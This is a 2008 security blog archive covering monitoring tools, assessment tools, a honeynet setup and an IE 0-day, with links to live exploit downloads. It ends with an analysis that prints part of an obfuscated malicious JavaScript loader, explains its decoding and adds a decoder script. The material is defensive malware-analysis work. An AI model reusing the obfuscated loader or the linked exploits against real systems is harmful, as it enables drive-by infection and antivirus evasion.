Monday, December 29, 2008

Monitoring Social Media

Web search is powerful for social media monitoring; there are many free tools and search engines that can help in this area. Combining the search results with RSS feeds gives an easy way to track social media. This can be very useful for watch-and-warning teams and security monitoring activities.

Monitor blogs, comments, news, tags, forums,...

Social Mention(blogs,comments)
Boardtracker (forums)
Yacktrack (comments on defined URL)
Backtype (comments, people)
Technorati (blogs)
Google Alert (web, news, ..)
Startpr (blogs, photos, videos, social networks)
Omgili (forums)
Serph (forums, social networks, blogs, news,...)
Keotag (tags)

Twitter (social messages)

Search for People:

Twitter Monitor

Tattler, Open Source Topic Monitoring Tool

Other tools:
Updated:
A comprehensive list is now available on http://wiki.kenburbary.com/social-meda-monitoring-wiki/

Wednesday, December 17, 2008

Free Security Assessment Tools

Security System Analyzer:
OVAL-compatible product
Full support for open security standards and initiatives (CVE, OVAL, CCE, CPE, CWE, CAPEC, CVSS, CRF)
Performs a deep inventory audit of installed software and applications
Scans for and maps vulnerabilities using non-intrusive, schema-based techniques
Detects and identifies missing patches and hotfixes
Helps define a patch management deployment strategy using CVSS scores
MS Baseline Security Analyzer:
Vulnerability assessment scan tool for MS products


Secunia Personal Software Inspector:
Scans all the software installed on your PC and advises you to update unpatched software.
http://secunia.com/vulnerability_scanning/personal/


Microsoft Security Assessment Tool:
MSAT consists of over 200 questions covering infrastructure, applications, operations, and people.
The questions and the recommendations that the tool offers are based on standards such as ISO 17799 and NIST 800-x, the Microsoft Trustworthy Computing group, and other external resources.

http://technet.microsoft.com/en-us/security/cc185712.aspx

Application Pen-Testing time Estimator:



Sunday, December 14, 2008

Anti-Virus Comparison

There is always debate about this kind of test, but these two reports are worth reading.

According to AV-Comparatives, AVIRA and ESET NOD32 are the best engines in terms of detection rate and overall performance.
http://www.av-comparatives.org/seiten/ergebnisse/summary2008.pdf


In a different report, AVIRA also scored higher than the others.
http://www.anti-malware-test.com/?q=node/39

Exploits archives

When doing pen-testing, the sites below are good sources for the exploits you may need:

Saturday, December 13, 2008

Virtual honeynet, network setup

I have seen lots of questions about networking a virtual honeynet, so here is my setup.
I am using a host machine with 3 VMs: a Honeywall, a honeypot, and a management station.
The IPs in the diagram are from a test setup; the honeypot IP should be changed to a real IP if it will be placed on the Internet, and no other IP changes are needed.


Wednesday, December 10, 2008

Fully patched Internet Explorer is Vulnerable, 0-Day again...

A remote exploit targeting fully patched IE (several versions) is available in the wild; the vulnerability is rated as critical.
VeriSign's iDefense security division reports that attack code was up for sale at prices of up to $15,000 through underground forums.


The exploit is available on http://milw0rm.com/exploits/7403
Real example of the exploit: http://milw0rm.com/sploits/2008-iesploit.tar.gz

Analysis by HD Moore:

Microsoft Official Advisory:

Snort Signatures:

List of sites exploiting this vulnerability:

Workaround:

The exploit is spreading:

The big picture:
Hackers are using mass SQL-injection attacks to infect legitimate sites with malicious IFrames and JavaScript that redirect the user to a malicious site hosting the IE exploit, so visitors to those trusted sites get infected; the exploit then drops different flavors of malware on the client PC.

Friday, December 5, 2008

MessageLabs Annual Security Report

- 90% of spam comes from botnets
- Complex web-based malware became widespread, resulting in malware being installed on computers with no user interaction
- Targeted trojan attacks rose in 2008
- Free online file-sharing services helped spammers upload and share malicious files using just a link; such a file can be a small HTML page with JavaScript that redirects the victim to the spammer's website
- Free web-hosting services are also being used increasingly by spammers to host spam content

Check the report:

Monday, December 1, 2008

Web Based Malware Analysis

While working on a JavaScript malware analysis, I found these tools useful:
Rhino
http://www.mozilla.org/rhino/
Malzilla
http://malzilla.sourceforge.net/
Caffeine monkey
http://www.mozilla.org/js/spidermonkey/
FreShow
http://www.jimmyleo.com/work/FreShowStart.htm
DecryptJS:
http://www.ukhoneynet.org/tools/decrypt-js/


I came across this malicious JavaScript
AAA=Array(63/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,42/**/,0/**/,22/**/,32/**/,47/**/,40/**/,50/**/,56/**/,60/**/,11/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,54/**/,8/**/,27/**/,45/**/,43/**/,58/**/,41/**/,31/**/,26/**/,2/**/,4/**/,17/**/,59/**/,44/**/,20/**/,28/**/,18/**/,19/**/,16/**/,52/**/,46/**/,61/**/,33/**/,39/**/,15/**/,14/**/,9/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,13/**/,23/**/,3/**/,25/**/,55/**/,10/**/,38/**/,62/**/,7/**/,24/**/,51/**/,29/**/,12/**/,5/**/,6/**/,35/**/,37/**/,48/**/,1/**/,36/**/,21/**/,57/**/,34/**/,53/**/,49/**/,30)
BBB="I7bHEVPGEK2a41oG8VWmWO6BWl@Btx2ZFd2HtnWO .. .. . . . . . ."
CCC=3536,DDD,EEE,FFF=''
YYY=ZZZ=XXX=0
for(EEE=4;EEE>0;EEE--)
{for(DDD=Math.min(CCC,1024);DDD>0;DDD--,CCC--)
{eval('XXX|=(AAA[BBB.charCodeAt(YYY++)-33]) << ZZZ;');

Here are my notes:
- The AAA array is the encoding key (a lookup table); if the attacker needs to change the code, he just changes the key, which helps with AV evasion.
- String.fromCha'+'rCode(8^XXX&255) means String.fromCharCode(8^XXX&255); the function name is split into two string literals and concatenated at runtime.
- BBB.charCodeAt(YYY++) gets the Unicode value of BBB character by character, starting from character 0 and going up to 1024 per pass.
- Let us take the first part:
I7bHEVPGEK2a41oG8VWmWO6BWl@
Starting with position 0 and incrementing by 1:
I7bHEVPGEK2a41oG8VWmWO6BWl@ ==> 73 55 98 72 69 86 80 71 69 75 50 97 52 49 111 71 56 86 87 109 87 79 54 66 87 108 64
Subtract 33 from each: 40 22 65 39 36 53 47 38 36 42 17 64 19 16 78 38 23 53 54 76 54 46 21 33 54 75 31
These are the indexes into AAA.

So look at the overall expression:
'XXX|=(AAA[BBB.charCodeAt(YYY++)-33]) << ZZZ;'
"|" is bitwise OR, "<<" is shift left.
- The encoding relies on bitwise OR and shift left.
- There is an easier way to do this: use Malzilla and its debug feature.
- Finally the code will try to connect to google-analyse.cn and download a malicious executable file.
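As an added example (not code from the original post), here is a stand-alone version of the decoder loop shown above, so the quoted part of BBB can be decoded outside the malicious script with Rhino or SpiderMonkey. AAA is the table from the sample verbatim; the loop body after "<< ZZZ" (6 bits in, 8 bits out, then XXX>>=8) is an assumption, since the fragment on the page cuts off there.

```javascript
// Added example (not from the original post): stand-alone decoder for the
// obfuscation scheme in the sample above. The accumulate/extract bookkeeping
// after "<< ZZZ" is assumed; the page's fragment stops before it.

// Key table from the sample: index = charCode - 33, value = 6-bit symbol.
const AAA = [
  63,0,0,0,0,0,0,0,0,0,0,0,0,0,0,42,0,22,32,47,40,50,56,60,11,0,0,0,0,0,0,
  54,8,27,45,43,58,41,31,26,2,4,17,59,44,20,28,18,19,16,52,46,61,33,39,15,14,9,
  0,0,0,0,0,0,13,23,3,25,55,10,38,62,7,24,51,29,12,5,6,35,37,48,1,36,21,57,34,53,49,30
];

// The step from the notes: character -> Unicode value -> minus 33 -> AAA index.
function symbolsOf(text) {
  return Array.from(text, ch => AAA[ch.charCodeAt(0) - 33]);
}

// OR each 6-bit symbol into the accumulator XXX at bit offset ZZZ; whenever
// 8 bits are available, emit String.fromCharCode(8^XXX&255), i.e. the low
// byte XORed with 8 ('&' binds tighter than '^'), then drop that byte.
function decodeBBB(text) {
  let XXX = 0, ZZZ = 0, out = '';
  for (const sym of symbolsOf(text)) {
    if (sym === undefined) throw new Error('character outside the AAA table');
    XXX |= sym << ZZZ;
    ZZZ += 6;
    if (ZZZ >= 8) {
      out += String.fromCharCode(8 ^ (XXX & 255));
      XXX >>= 8;
      ZZZ -= 8;
    }
  }
  return out; // fewer than 8 leftover bits are padding and are dropped
}

// The first 27 characters of BBB as quoted in the post (the only part of the
// payload the page shows).
const SAMPLE = 'I7bHEVPGEK2a41oG8VWmWO6BWl@';
console.log(symbolsOf(SAMPLE).join(' '));
console.log(JSON.stringify(decodeBBB(SAMPLE)));
```

Run on the quoted prefix it yields the start of the URL the notes mention, which is a quick check that the assumed loop body matches the original.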


References:
http://rishida.net/scripts/uniview/conversion.php
http://www.eecs.umich.edu/~bartlett/jsops.html
http://doc.sumy.ua/prog/jsm/ch13.htm#BitwiseOROperator
http://www.ukhoneynet.org/wp-content/uploads/2007/08/decryptjs.tgz